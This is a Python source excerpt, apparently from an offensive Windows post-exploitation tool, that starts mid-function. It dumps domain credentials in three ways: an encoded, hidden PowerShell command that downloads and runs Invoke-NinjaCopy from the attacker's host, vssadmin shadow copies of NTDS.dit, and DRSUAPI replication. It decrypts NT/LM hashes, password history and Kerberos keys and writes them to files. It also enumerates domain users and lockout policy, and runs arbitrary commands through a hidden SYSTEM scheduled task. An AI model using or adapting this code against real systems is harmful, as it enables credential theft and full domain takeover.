logging.info('Registry says NTDS.dit is at %s' % ntdsLocation)
tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
local_ip = self.__smbConnection.getSMBServer().get_socket().getsockname()[0]
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-NinjaCopy.ps1');
Invoke-NinjaCopy -Path "{ntdspath}" -LocalDestination "$env:systemroot\\Temp\\{tmpname}";
""".format(addr=local_ip, ntdspath=ntdsLocation, tmpname=tmpFileName)
self.__executeRemote('%%COMSPEC%% /C powershell.exe -exec bypass -window hidden -noni -nop -encoded %s' % ps_command(command=command))
remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)
else:
logging.info('Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % ntdsLocation)
# Get the list of remote shadows
shadow, shadowFor = self.__getLastVSS()
if shadow == '' or (shadow != '' and shadowFor != ntdsDrive):
# No shadow, create one
self.__executeRemote('%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive)
shadow, shadowFor = self.__getLastVSS()
shouldRemove = True
if shadow == '':
raise Exception('Could not get a VSS')
else:
shouldRemove = False
# Now copy the ntds.dit to the temp directory
tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
self.__executeRemote('%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName))
if shouldRemove is True:
self.__executeRemote('%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive)
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\' + OUTPUT_FILENAME)
remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)
return remoteFileName
class NTDSHashes:
NAME_TO_INTERNAL = {
'uSNCreated':'ATTq131091',
'uSNChanged':'ATTq131192',
'name':'ATTm3',
'objectGUID':'ATTk589826',
'objectSid':'ATTr589970',
'userAccountControl':'ATTj589832',
'primaryGroupID':'ATTj589922',
'accountExpires':'ATTq589983',
'logonCount':'ATTj589993',
'sAMAccountName':'ATTm590045',
'sAMAccountType':'ATTj590126',
'lastLogonTimestamp':'ATTq589876',
'userPrincipalName':'ATTm590480',
'unicodePwd':'ATTk589914',
'dBCSPwd':'ATTk589879',
'ntPwdHistory':'ATTk589918',
'lmPwdHistory':'ATTk589984',
'pekList':'ATTk590689',
'supplementalCredentials':'ATTk589949',
}
NAME_TO_ATTRTYP = {
'userPrincipalName': 0x90290,
'sAMAccountName': 0x900DD,
'unicodePwd': 0x9005A,
'dBCSPwd': 0x90037,
'ntPwdHistory': 0x9005E,
'lmPwdHistory': 0x900A0,
'supplementalCredentials': 0x9007D,
'objectSid': 0x90092,
}
KERBEROS_TYPE = {
1:'dec-cbc-crc',
3:'des-cbc-md5',
17:'aes128-cts-hmac-sha1-96',
18:'aes256-cts-hmac-sha1-96',
0xffffff74:'rc4_hmac',
}
INTERNAL_TO_NAME = dict((v,k) for k,v in NAME_TO_INTERNAL.iteritems())
SAM_NORMAL_USER_ACCOUNT = 0x30000000
SAM_MACHINE_ACCOUNT = 0x30000001
SAM_TRUST_ACCOUNT = 0x30000002
ACCOUNT_TYPES = ( SAM_NORMAL_USER_ACCOUNT, SAM_MACHINE_ACCOUNT, SAM_TRUST_ACCOUNT)
class PEK_KEY(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedPek','52s=""'),
)
class CRYPTED_HASH(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash','16s=""'),
)
class CRYPTED_HISTORY(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash',':'),
)
class CRYPTED_BLOB(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash',':'),
)
def __init__(self, ntdsFile, bootKey, noLMHash=True, remoteOps=None, useVSSMethod=False):
self.__bootKey = bootKey
self.__NTDS = ntdsFile
self.__history = False
self.__noLMHash = noLMHash
self.__useVSSMethod = useVSSMethod
self.dumped_hashes = {'hashes': [], 'kerb': []}
self.__remoteOps = remoteOps
if self.__NTDS is not None:
self.__ESEDB = ESENT_DB(ntdsFile, isRemote = True)
self.__cursor = self.__ESEDB.openTable('datatable')
self.__tmpUsers = list()
self.__PEK = None
self.__cryptoCommon = CryptoCommon()
self.__hashesFound = {}
self.__kerberosKeys = OrderedDict()
def __getPek(self):
logging.info('Searching for pekList, be patient')
pek = None
while True:
record = self.__ESEDB.getNextRow(self.__cursor)
if record is None:
break
elif record[self.NAME_TO_INTERNAL['pekList']] is not None:
pek = unhexlify(record[self.NAME_TO_INTERNAL['pekList']])
break
elif record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
# Okey.. we found some users, but we're not yet ready to process them.
# Let's just store them in a temp list
self.__tmpUsers.append(record)
if pek is not None:
encryptedPek = self.PEK_KEY(pek)
md5 = hashlib.new('md5')
md5.update(self.__bootKey)
for i in range(1000):
md5.update(encryptedPek['KeyMaterial'])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.encrypt(encryptedPek['EncryptedPek'])
self.__PEK = plainText[36:]
def __removeRC4Layer(self, cryptedHash):
md5 = hashlib.new('md5')
md5.update(self.__PEK)
md5.update(cryptedHash['KeyMaterial'])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.encrypt(cryptedHash['EncryptedHash'])
return plainText
def __removeDESLayer(self, cryptedHash, rid):
Key1,Key2 = self.__cryptoCommon.deriveKey(int(rid))
Crypt1 = DES.new(Key1, DES.MODE_ECB)
Crypt2 = DES.new(Key2, DES.MODE_ECB)
decryptedHash = Crypt1.decrypt(cryptedHash[:8]) + Crypt2.decrypt(cryptedHash[8:])
return decryptedHash
def __decryptSupplementalInfo(self, record, rid=None):
# This is based on [MS-SAMR] 2.2.10 Supplemental Credentials Structures
haveInfo = False
if self.__useVSSMethod is True:
if record[self.NAME_TO_INTERNAL['supplementalCredentials']] is not None:
if len(unhexlify(record[self.NAME_TO_INTERNAL['supplementalCredentials']])) > 24:
if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
else:
userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
cipherText = self.CRYPTED_BLOB(unhexlify(record[self.NAME_TO_INTERNAL['supplementalCredentials']]))
plainText = self.__removeRC4Layer(cipherText)
haveInfo = True
else:
domain = None
userName = None
for attr in record['pmsgOut']['V6']['pObjects']['Entinf']['AttrBlock']['pAttr']:
if attr['attrTyp'] == self.NAME_TO_ATTRTYP['userPrincipalName']:
if attr['AttrVal']['valCount'] > 0:
try:
domain = ''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le').split('@')[-1]
except:
domain = None
else:
domain = None
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['sAMAccountName']:
if attr['AttrVal']['valCount'] > 0:
try:
userName = ''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le')
except:
logging.error('Cannot get sAMAccountName for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
userName = 'unknown'
else:
logging.error('Cannot get sAMAccountName for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
userName = 'unknown'
if attr['attrTyp'] == self.NAME_TO_ATTRTYP['supplementalCredentials']:
if attr['AttrVal']['valCount'] > 0:
blob = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
plainText = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), blob)
if len(plainText) > 24:
haveInfo = True
if domain is not None:
userName = '%s\\%s' % (domain, userName)
if haveInfo is True:
try:
userProperties = samr.USER_PROPERTIES(plainText)
except:
# On some old w2k3 there might be user properties that don't
# match [MS-SAMR] structure, discarding them
return
propertiesData = userProperties['UserProperties']
for propertyCount in range(userProperties['PropertyCount']):
userProperty = samr.USER_PROPERTY(propertiesData)
propertiesData = propertiesData[len(userProperty):]
# For now, we will only process Newer Kerberos Keys.
if userProperty['PropertyName'].decode('utf-16le') == 'Primary:Kerberos-Newer-Keys':
propertyValueBuffer = unhexlify(userProperty['PropertyValue'])
kerbStoredCredentialNew = samr.KERB_STORED_CREDENTIAL_NEW(propertyValueBuffer)
data = kerbStoredCredentialNew['Buffer']
for credential in range(kerbStoredCredentialNew['CredentialCount']):
keyDataNew = samr.KERB_KEY_DATA_NEW(data)
data = data[len(keyDataNew):]
keyValue = propertyValueBuffer[keyDataNew['KeyOffset']:][:keyDataNew['KeyLength']]
if self.KERBEROS_TYPE.has_key(keyDataNew['KeyType']):
answer = "%s:%s:%s" % (userName, self.KERBEROS_TYPE[keyDataNew['KeyType']],hexlify(keyValue))
else:
answer = "%s:%s:%s" % (userName, hex(keyDataNew['KeyType']),hexlify(keyValue))
# We're just storing the keys, not printing them, to make the output more readable
# This is kind of ugly... but it's what I came up with tonight to get an ordered
# set :P. Better ideas welcomed ;)
self.__kerberosKeys[answer] = None
def __decryptHash(self, record, rid=None):
if self.__useVSSMethod is True:
logging.debug('Decrypting hash for user: %s' % record[self.NAME_TO_INTERNAL['name']])
sid = SAMR_RPC_SID(unhexlify(record[self.NAME_TO_INTERNAL['objectSid']]))
rid = sid.formatCanonical().split('-')[-1]
if record[self.NAME_TO_INTERNAL['dBCSPwd']] is not None:
encryptedLMHash = self.CRYPTED_HASH(unhexlify(record[self.NAME_TO_INTERNAL['dBCSPwd']]))
tmpLMHash = self.__removeRC4Layer(encryptedLMHash)
LMHash = self.__removeDESLayer(tmpLMHash, rid)
else:
LMHash = ntlm.LMOWFv1('', '')
if record[self.NAME_TO_INTERNAL['unicodePwd']] is not None:
encryptedNTHash = self.CRYPTED_HASH(unhexlify(record[self.NAME_TO_INTERNAL['unicodePwd']]))
tmpNTHash = self.__removeRC4Layer(encryptedNTHash)
NTHash = self.__removeDESLayer(tmpNTHash, rid)
else:
NTHash = ntlm.NTOWFv1('', '')
if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
else:
userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
answer = "%s:%s:%s:%s:::" % (userName, rid, hexlify(LMHash), hexlify(NTHash))
self.__hashesFound[unhexlify(record[self.NAME_TO_INTERNAL['objectSid']])] = answer
self.dumped_hashes['hashes'].append(answer)
if self.__history:
LMHistory = []
NTHistory = []
if record[self.NAME_TO_INTERNAL['lmPwdHistory']] is not None:
encryptedLMHistory = self.CRYPTED_HISTORY(unhexlify(record[self.NAME_TO_INTERNAL['lmPwdHistory']]))
tmpLMHistory = self.__removeRC4Layer(encryptedLMHistory)
for i in range(0, len(tmpLMHistory) / 16):
LMHash = self.__removeDESLayer(tmpLMHistory[i * 16:(i + 1) * 16], rid)
LMHistory.append(LMHash)
if record[self.NAME_TO_INTERNAL['ntPwdHistory']] is not None:
encryptedNTHistory = self.CRYPTED_HISTORY(unhexlify(record[self.NAME_TO_INTERNAL['ntPwdHistory']]))
tmpNTHistory = self.__removeRC4Layer(encryptedNTHistory)
for i in range(0, len(tmpNTHistory) / 16):
NTHash = self.__removeDESLayer(tmpNTHistory[i * 16:(i + 1) * 16], rid)
NTHistory.append(NTHash)
for i, (LMHash, NTHash) in enumerate(
map(lambda l, n: (l, n) if l else ('', n), LMHistory[1:], NTHistory[1:])):
if self.__noLMHash:
lmhash = hexlify(ntlm.LMOWFv1('', ''))
else:
lmhash = hexlify(LMHash)
answer = "%s_history%d:%s:%s:%s:::" % (userName, i, rid, lmhash, hexlify(NTHash))
self.__hashesFound[unhexlify(record[self.NAME_TO_INTERNAL['objectSid']]) + str(i)] = answer
self.dumped_hashes['hashes'].append(answer)
else:
logging.debug('Decrypting hash for user: %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
domain = None
if self.__history:
LMHistory = []
NTHistory = []
for attr in record['pmsgOut']['V6']['pObjects']['Entinf']['AttrBlock']['pAttr']:
if attr['attrTyp'] == self.NAME_TO_ATTRTYP['dBCSPwd']:
if attr['AttrVal']['valCount'] > 0:
encrypteddBCSPwd = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
encryptedLMHash = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encrypteddBCSPwd)
LMHash = drsuapi.removeDESLayer(encryptedLMHash, rid)
else:
LMHash = ntlm.LMOWFv1('', '')
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['unicodePwd']:
if attr['AttrVal']['valCount'] > 0:
encryptedUnicodePwd = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
encryptedNTHash = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encryptedUnicodePwd)
NTHash = drsuapi.removeDESLayer(encryptedNTHash, rid)
else:
NTHash = ntlm.NTOWFv1('', '')
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['userPrincipalName']:
if attr['AttrVal']['valCount'] > 0:
try:
domain = ''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le').split('@')[-1]
except:
domain = None
else:
domain = None
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['sAMAccountName']:
if attr['AttrVal']['valCount'] > 0:
try:
userName = ''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le')
except:
logging.error('Cannot get sAMAccountName for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
userName = 'unknown'
else:
logging.error('Cannot get sAMAccountName for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
userName = 'unknown'
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['objectSid']:
if attr['AttrVal']['valCount'] > 0:
objectSid = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
else:
logging.error('Cannot get objectSid for %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
objectSid = rid
if self.__history:
if attr['attrTyp'] == self.NAME_TO_ATTRTYP['lmPwdHistory']:
if attr['AttrVal']['valCount'] > 0:
encryptedLMHistory = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
tmpLMHistory = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encryptedLMHistory)
for i in range(0, len(tmpLMHistory) / 16):
LMHashHistory = drsuapi.removeDESLayer(tmpLMHistory[i * 16:(i + 1) * 16], rid)
LMHistory.append(LMHashHistory)
else:
logging.debug('No lmPwdHistory for user %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
elif attr['attrTyp'] == self.NAME_TO_ATTRTYP['ntPwdHistory']:
if attr['AttrVal']['valCount'] > 0:
encryptedNTHistory = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])
tmpNTHistory = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encryptedNTHistory)
for i in range(0, len(tmpNTHistory) / 16):
NTHashHistory = drsuapi.removeDESLayer(tmpNTHistory[i * 16:(i + 1) * 16], rid)
NTHistory.append(NTHashHistory)
else:
logging.debug('No ntPwdHistory for user %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])
if domain is not None:
userName = '%s\\%s' % (domain, userName)
answer = "%s:%s:%s:%s:::" % (userName, rid, hexlify(LMHash), hexlify(NTHash))
self.__hashesFound[objectSid] = answer
self.dumped_hashes['hashes'].append(answer)
if self.__history:
for i, (LMHashHistory, NTHashHistory) in enumerate(
map(lambda l, n: (l, n) if l else ('', n), LMHistory[1:], NTHistory[1:])):
if self.__noLMHash:
lmhash = hexlify(ntlm.LMOWFv1('', ''))
else:
lmhash = hexlify(LMHashHistory)
answer = "%s_history%d:%s:%s:%s:::" % (userName, i, rid, lmhash, hexlify(NTHashHistory))
self.__hashesFound[objectSid + str(i)] = answer
print answer
def dump(self):
if self.__NTDS is None and self.__useVSSMethod is True:
# No NTDS.dit file provided and were asked to use VSS
return
else:
try:
self.__remoteOps.connectSamr(self.__remoteOps.getMachineNameAndDomain()[1])
except:
# Target's not a DC
return
logging.info('Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)')
if self.__useVSSMethod:
# We start getting rows from the table aiming at reaching
# the pekList. If we find users records we stored them
# in a temp list for later process.
self.__getPek()
if self.__PEK is not None:
logging.info('Pek found and decrypted: 0x%s' % hexlify(self.__PEK))
logging.info('Reading and decrypting hashes from %s ' % self.__NTDS)
# First of all, if we have users already cached, let's decrypt their hashes
for record in self.__tmpUsers:
try:
self.__decryptHash(record)
self.__decryptSupplementalInfo(record)
except Exception, e:
# import traceback
# print traceback.print_exc()
try:
logging.error(
"Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
logging.error(str(e))
pass
except:
logging.error("Error while processing row!")
logging.error(str(e))
pass
# Now let's keep moving through the NTDS file and decrypting what we find
while True:
try:
record = self.__ESEDB.getNextRow(self.__cursor)
except:
logging.error('Error while calling getNextRow(), trying the next one')
continue
if record is None:
break
try:
if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
self.__decryptHash(record)
self.__decryptSupplementalInfo(record)
except Exception, e:
# import traceback
# print traceback.print_exc()
try:
logging.error(
"Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
logging.error(str(e))
pass
except:
logging.error("Error while processing row!")
logging.error(str(e))
pass
else:
logging.info('Using the DRSUAPI method to get NTDS.DIT secrets')
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
resp = self.__remoteOps.getDomainUsers(enumerationContext)
for user in resp['Buffer']['Buffer']:
userName = user['Name']
userSid = self.__remoteOps.ridToSid(user['RelativeId'])
# Let's crack the user sid into DS_FQDN_1779_NAME
# In theory I shouldn't need to crack the sid. Instead
# I could use it when calling DRSGetNCChanges inside the DSNAME parameter.
# For some reason tho, I get ERROR_DS_DRA_BAD_DN when doing so.
crackedName = self.__remoteOps.DRSCrackNames(drsuapi.DS_NAME_FORMAT.DS_SID_OR_SID_HISTORY_NAME, drsuapi.DS_NAME_FORMAT.DS_FQDN_1779_NAME, name = userSid.formatCanonical())
if crackedName['pmsgOut']['V1']['pResult']['cItems'] == 1:
userRecord = self.__remoteOps.DRSGetNCChanges(crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1])
#userRecord.dump()
if userRecord['pmsgOut']['V6']['cNumObjects'] == 0:
raise Exception('DRSGetNCChanges didn\'t return any object!')
else:
logging.warning('DRSCrackNames returned %d items for user %s, skipping' %(crackedName['pmsgOut']['V1']['pResult']['cItems'], userName))
try:
self.__decryptHash(userRecord, user['RelativeId'])
self.__decryptSupplementalInfo(userRecord, user['RelativeId'])
except Exception, e:
#import traceback
#traceback.print_exc()
logging.error("Error while processing user!")
logging.error(str(e))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
# Now we'll print the Kerberos keys. So we don't mix things up in the output.
if len(self.__kerberosKeys) > 0:
if self.__useVSSMethod is True:
logging.info('Kerberos keys from %s ' % self.__NTDS)
else:
logging.info('Kerberos keys grabbed')
for itemKey in self.__kerberosKeys.keys():
self.dumped_hashes['kerb'].append(itemKey)
return self.dumped_hashes
def export(self, fileName):
if len(self.__hashesFound) > 0:
items = sorted(self.__hashesFound)
fd = open(fileName+'.ntds','w+')
for item in items:
try:
fd.write(self.__hashesFound[item]+'\n')
except:
try:
logging.error("Error writing entry %d, skipping" % item)
except:
logging.error("Error writing entry, skipping")
pass
fd.close()
if len(self.__kerberosKeys) > 0:
fd = open(fileName+'.ntds.kerberos','w+')
for itemKey in self.__kerberosKeys.keys():
fd.write(itemKey+'\n')
fd.close()
def finish(self):
if self.__NTDS is not None:
self.__ESEDB.close()
class DumpSecrets:
def __init__(self, address, username='', password='', domain='', hashes=None, sam=False, ntds=False, useVSSMethod=False, useNinjaMethod=False):
self.__remoteAddr = address
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__sam = sam
self.__ntds = ntds
self.__useVSSMethod = useVSSMethod
self.__useNinjaMethod = useNinjaMethod
self.__remoteOps = None
self.__SAMHashes = None
self.__isRemote = True
self.dumped_ntds_hashes = None
self.dumped_sam_hashes = None
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def getBootKey(self):
# Local Version whenever we are given the files directly
bootKey = ''
tmpKey = ''
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
for key in ['JD','Skew1','GBG','Data']:
logging.debug('Retrieving class info for %s'% key)
ans = winreg.getClass('\\%s\\Control\\Lsa\\%s' % (currentControlSet,key))
digit = ans[:16].decode('utf-16le')
tmpKey = tmpKey + digit
transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]
tmpKey = unhexlify(tmpKey)
for i in xrange(len(tmpKey)):
bootKey += tmpKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % hexlify(bootKey))
return bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
#noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)[1]
noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)
if noLmHash is not None:
noLmHash = noLmHash[1]
else:
noLmHash = 0
if noLmHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def dump(self, smbconnection):
try:
self.__remoteOps = RemoteOperations(smbconnection)
self.__remoteOps.enableRegistry()
bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
SECURITYFileName = self.__remoteOps.saveSECURITY()
if self.__sam is True:
SAMFileName = self.__remoteOps.saveSAM()
self.__SAMHashes = SAMHashes(SAMFileName, bootKey)
self.dumped_sam_hashes = self.__SAMHashes.dump()
elif self.__ntds is True:
if self.__useVSSMethod:
NTDSFileName = self.__remoteOps.saveNTDS()
elif self.__useNinjaMethod:
NTDSFileName = self.__remoteOps.saveNTDS(ninja=True)
self.__useVSSMethod = True
else:
NTDSFileName = None
self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, noLMHash=self.__noLMHash, remoteOps=self.__remoteOps, useVSSMethod=self.__useVSSMethod)
try:
self.dumped_ntds_hashes = self.__NTDSHashes.dump()
except Exception, e:
logging.error(e)
if self.__useVSSMethod is False:
logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
except (Exception, KeyboardInterrupt), e:
traceback.print_exc()
try:
self.cleanup()
except:
pass
def cleanup(self):
logging.info('Cleaning up... ')
if self.__remoteOps:
self.__remoteOps.finish()
if self.__SAMHashes:
self.__SAMHashes.finish()
if self.__NTDSHashes:
self.__NTDSHashes.finish()
class ListUsersException(Exception):
pass
class SAMRDump:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445),
}
def __init__(self, protocols = None, username = '', password = '', domain = '', hashes = None, aesKey=None, doKerberos = False):
if not protocols:
self.__protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
else:
self.__protocols = [protocols]
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def dump(self, addr):
"""Dumps the list of users and shares registered present at
addr. Addr is a valid host name or IP address.
"""
#logging.info('Retrieving endpoint list from %s' % addr)
# Try all requested protocols until one works.
for protocol in self.__protocols:
protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
#logging.info("Trying protocol %s..." % protocol)
rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, doKerberos = self.__doKerberos)
try:
return self.__fetchList(rpctransport)
except Exception, e:
logging.info(str(e))
else:
# Got a response. No need for further iterations.
break
def __fetchList(self, rpctransport):
dce = rpctransport.get_dce_rpc()
entries = {'users': []}
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
#logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
resp = samr.hSamrQueryInformationDomain(dce, domainHandle)
lthresh = resp['Buffer']['General2']['LockoutThreshold']
entries["lthresh"] = lthresh
if lthresh != 0:
entries['lduration'] = (resp['Buffer']['General2']['LockoutDuration'] / -600000000)
else:
entries['lduration'] = 0
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext = enumerationContext)
except DCERPCException, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user['RelativeId'])
info = samr.hSamrQueryInformationUser2(dce, r['UserHandle'],samr.USER_INFORMATION_CLASS.UserAllInformation)
#entry = (user['Name'], user['RelativeId'], info['Buffer']['All'])
entries['users'].append(user['Name'])
samr.hSamrCloseHandle(dce, r['UserHandle'])
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except ListUsersException, e:
logging.info("Error listing users: %s" % e)
dce.disconnect()
return entries
class TSCH_EXEC:
def __init__(self, username, password, command, domain ='', hashes=None , noOutput=False):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__myIPaddr = None
self.__aesKey = None
self.__doKerberos = False
self.__command = command
self.__tmpName = ''.join([random.choice(string.letters) for _ in range(8)])
self.__tmpFileName = self.__tmpName + '.tmp'
self.__smbConnection = None
self.__dceConnection = None
self.__noOutput = noOutput
self.__mode = 'SHARE'
self.output = ''
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def play(self, addr):
stringbinding = r'ncacn_np:%s[\pipe\atsvc]' % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos)
try:
self.doStuff(rpctransport)
except Exception as e:
logging.info(e)
if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >=0:
#If we receive the 'STATUS_OBJECT_NAME_NOT_FOUND' error, it might work if we try again
sleep(1)
self.doStuff(rpctransport)
else:
if self.__noOutput is False:
self.__myIPaddr = self.__smbConnection.getSMBServer().get_socket().getsockname()[0]
logging.info('Starting SMB Server')
smb_server = SMBServer()
smb_server.daemon = True
smb_server.start()
self.__mode = 'SERVER'
self.doStuff(rpctransport)
smb_server.stop()
def doStuff(self, rpctransport):
def output_callback(data):
self.output += data
dce = rpctransport.get_dce_rpc()
self.__dceConnection = dce
dce.set_credentials(*rpctransport.get_credentials())
dce.connect()
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
dce.bind(tsch.MSRPC_UUID_TSCHS)
xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="LocalSystem">
<Exec>
<Command>cmd.exe</Command>
"""
if self.__mode == 'SHARE':
xml += """ <Arguments>/C {} > %windir%\\Temp\\{} 2>&1</Arguments>
</Exec>
</Actions>
</Task>
""".format(self.__command, self.__tmpFileName)
elif self.__mode == 'SERVER':
xml += """ <Arguments>/C {} > \\\\{}\\{}\\{} 2>&1</Arguments>
</Exec>
</Actions>
</Task>
""".format(self.__command, self.__myIPaddr, DUMMY_SHARE, self.__tmpFileName)
